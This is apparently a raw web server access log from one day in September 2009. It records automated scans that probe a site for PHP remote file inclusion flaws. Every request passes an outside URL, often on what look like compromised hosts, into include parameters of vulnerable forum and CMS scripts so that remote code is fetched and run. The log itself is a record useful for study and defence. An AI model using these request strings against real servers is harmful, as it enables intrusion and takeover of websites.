219.85.63.226 - - [07/Sep/2009:01:44:50 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:44:50 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:44:50 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:01:45:47 -0700] "GET /logs/access_090302.log/index.php?nic=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:46:18 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:46:18 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:46:18 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:46:32 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:46:32 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:46:32 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:46:35 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:46:35 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:46:35 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:46:59 -0700] "GET /logs/access_090803.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:23 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:24 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:47:27 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:47:27 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:47:27 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:27 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:28 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:29 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:30 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:31 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:34 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:34 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:35 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:41 -0700] "GET //e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:47:41 -0700] "GET //e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:48:09 -0700] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:01:48:11 -0700] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:48:33 -0700] "GET /logs/access_090309.log///e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:48:33 -0700] "GET //e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:48:34 -0700] "GET /logs///e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:48:49 -0700] "GET /logs/access_090309.log///e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:48:50 -0700] "GET //e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:48:51 -0700] "GET /logs///e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:01:50:49 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:51:47 -0700] "GET /logs/access_090223.log///e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:51:48 -0700] "GET /logs/access_090223.log///e404.php?DOCUMENT_ROOT=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:17 -0700] "GET /logs/access_090518.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:17 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:27 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:44 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:44 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:44 -0700] "GET /logs/access_090518.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:44 -0700] "GET /logs/access_090511.log%20%20//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:54 -0700] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:01:52:54 -0700] "GET /include/bbs.lib.inc.php?site_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:01:53:07 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:53:55 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:54:22 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:01:55:53 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:01:55:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:01:55:53 -0700] "GET /logs/access_090713.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:56:32 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:01:56:32 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://junior-cup.de/modules/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:01:56:58 -0700] "GET /logs/access_090511.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:01:57:41 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:01:57:41 -0700] "GET /logs/access_090713.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:01:57:41 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:01:59:39 -0700] "GET /logs/access_090323.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:01:59:40 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:01:59:40 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:01:59:41 -0700] "GET /logs/access_090720.log%20%20//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:00:25 -0700] "GET /logs/access_090803.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:02:08:22 -0700] "GET /logs/access_090629.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:22 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:22 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:22 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:26 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:26 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:26 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:27 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:30 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:09:30 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:10:11 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:10:11 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:10:11 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:10:12 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:10:12 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:10:12 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:11:59 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:11:59 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:11:59 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:12:16 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:12:16 -0700] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:12:16 -0700] "GET /logs/access_090309.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:12:21 -0700] "GET /logs/access_090223.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:13:44 -0700] "GET /logs/access_090608.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:13:44 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:13:44 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:13:46 -0700] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:13:46 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:13:46 -0700] "GET /logs/access_090309.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:13:52 -0700] "GET /logs/access_090223.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:14:32 -0700] "GET /logs/access_090309.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:02:14:33 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:02:14:33 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:02:14:33 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [07/Sep/2009:02:14:42 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
65.38.188.164 - - [07/Sep/2009:02:14:43 -0700] "GET /logs/access_090223.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:02:14:44 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:02:14:44 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:02:14:44 -0700] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:14:46 -0700] "GET /logs/access_090309.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:02:14:47 -0700] "GET /logs/access_090223.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:02:17:10 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.25.226 - - [07/Sep/2009:02:17:10 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.25.226 - - [07/Sep/2009:02:17:10 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [07/Sep/2009:02:20:24 -0700] "GET /logs/access_090309.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:02:25:30 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [07/Sep/2009:02:25:30 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [07/Sep/2009:02:25:30 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.141.196.8 - - [07/Sep/2009:02:35:00 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:35:00 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:35:00 -0700] "GET /logs/access_090316.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:02:35:08 -0700] "GET /logs/access_090202.log%20//newspublish/include.php?path%5Bdocroot%5D=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
